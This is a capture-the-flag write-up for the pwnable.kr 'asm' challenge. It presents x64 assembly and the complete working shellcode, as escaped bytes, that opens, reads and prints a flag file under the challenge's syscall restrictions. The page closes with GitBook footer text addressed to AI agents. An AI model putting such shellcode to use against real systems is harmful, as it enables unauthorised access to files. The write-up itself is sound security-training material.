> For the complete documentation index, see [llms.txt](https://nickbhe.gitbook.io/shikata-ga-nai/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://nickbhe.gitbook.io/shikata-ga-nai/pwnable.kr/18-asm.md). # 18 - asm ## The Challenge Mommy! I think I know how to make shellcodes ssh -p2222 (pw: guest) ## The Solution The challenge directory contains a readme: > once you connect to port 9026, the "asm" binary will be executed under asm\_pwn privilege. make connection to challenge (nc 0 9026) then get the flag. (file name of the flag is same as the one in this directory) The directory really contains a file with an awefully long name. It's time to run the binary: ![The last line and a half is my input, don't get confused :)](/files/-MIroJChVAf86Cx4jSq-) Our input should be x64 shellcode that uses only `open, read` and `write` to print the flag. A peek at the source code shows there aren't any shenanigans, it's really what we need to do. The source also contains shell code which our shell code gets concatinated to. Lets [decode](https://defuse.ca/online-x86-assembler.htm#disassembly2) it: ![](/files/-MIrqJOInVmPc6lfX93y) It zeros the registers. That's actualy quite nice of pwnables side, thanks ^\_^ It's time to write some pure assembly! Using [this](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md) wonderful table we created assembly that opens the flag file, reads it and outputs to stdout. ``` mov rax, 2 mov rdi, 0x4141406f syscall mov rdi, rax mov rax, 0 mov rsi, 0x4141406f mov rdx, 0x30 syscall mov rax, 1 mov rdi, 1 syscall # shellcode: \x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05 ``` You may be asking yourself "what's that address that is assigned to rsi and rdi?" We concatinate the flag file name to the end of the shellcode, and that's it's addess. We also read the flag to the same location. The final shellcode: ``` \x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05\x25\x00\x00\x00\x00\x0F\x05\x74\x68\x69\x73\x5f\x69\x73\x5f\x70\x77\x6e\x61\x62\x6c\x65\x2e\x6b\x72\x5f\x66\x6c\x61\x67\x5f\x66\x69\x6c\x65\x5f\x70\x6c\x65\x61\x73\x65\x5f\x72\x65\x61\x64\x5f\x74\x68\x69\x73\x5f\x66\x69\x6c\x65\x2e\x73\x6f\x72\x72\x79\x5f\x74\x68\x65\x5f\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x5f\x69\x73\x5f\x76\x65\x72\x79\x5f\x6c\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x6e\x67\x00 ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://nickbhe.gitbook.io/shikata-ga-nai/pwnable.kr/18-asm.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.